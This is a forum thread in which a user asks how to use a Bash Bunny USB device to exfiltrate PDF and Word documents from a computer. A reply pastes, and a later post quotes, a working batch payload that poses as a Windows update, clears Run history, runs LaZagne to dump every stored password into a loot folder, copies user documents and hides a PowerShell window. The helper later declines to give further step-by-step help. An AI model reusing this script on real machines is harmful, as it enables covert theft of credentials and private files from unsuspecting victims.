Jump to content

Recommended Posts

Hello Guys!

I've just received my Bash Bunny and need some Help.

I've updated it already and want to use the Document Exfiltration.

Can someone explain it step by step, what I've to do?

I want to exfiltrate PDFs and .docx from a computer and/or from a USB stick plugged in a computer.

Is this possible?

Please HELP

Share this post


Link to post
Share on other sites

It's a lot easier if you learn the steps yourself , there are many places full of resources YouTube search bash bunny introduction

 

github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/usb_exfiltrator

Edit e.cmd

 


 
@echo off
@echo Installing Windows Update
 
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
 
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
 
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
 
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
 
if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
 
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
 
REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
 
)
 
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
 
@cls
@exit

 

 

The e. C MD file can be edited near the bottom to copy what you want edit the X copy and just put your file extension

Edited by m40295

Share this post


Link to post
Share on other sites
2 hours ago, m40295 said:

It's a lot easier if you learn the steps yourself , there are many places full of resources YouTube search bash bunny introduction

 

github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/usb_exfiltrator

Edit e.cmd

 



 
@echo off
@echo Installing Windows Update
 
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
 
REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
 
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
 
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
 
if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
 
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
 
REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
 
)
 
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
 
@cls
@exit

 

 

The e. C MD file can be edited near the bottom to copy what you want edit the X copy and just put your file extension

It’s a bit hard for me to understand Because I’m not a Native American speaker. 

Ive only found like 2/3 videos for exfiltration. 

It Would be very nice if you can explain it to me step by step. 

I would be veruz grateful:-)

Share this post


Link to post
Share on other sites

Sorry no 

Maybe someone else can help you but it's a fairly basic payload drag drop modify one or two lines

Share this post


Link to post
Share on other sites
9 hours ago, m40295 said:

Sorry no 

Maybe someone else can help you but it's a fairly basic payload drag drop modify one or two lines

What if I give you 10$?

i would pay you if it works.

Share this post


Link to post
Share on other sites

You can offer me a million and I still wouldn't take. What if I offer you some links to do research so you can teach yourself

Share this post


Link to post
Share on other sites
6 hours ago, m40295 said:

You can offer me a million and I still wouldn't take. What if I offer you some links to do research so you can teach yourself

Okay Deal!

  • Like 1

Share this post


Link to post
Share on other sites

Message me in private (on the forum) I will give you some links to read, watch etc. 

  • Upvote 3

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...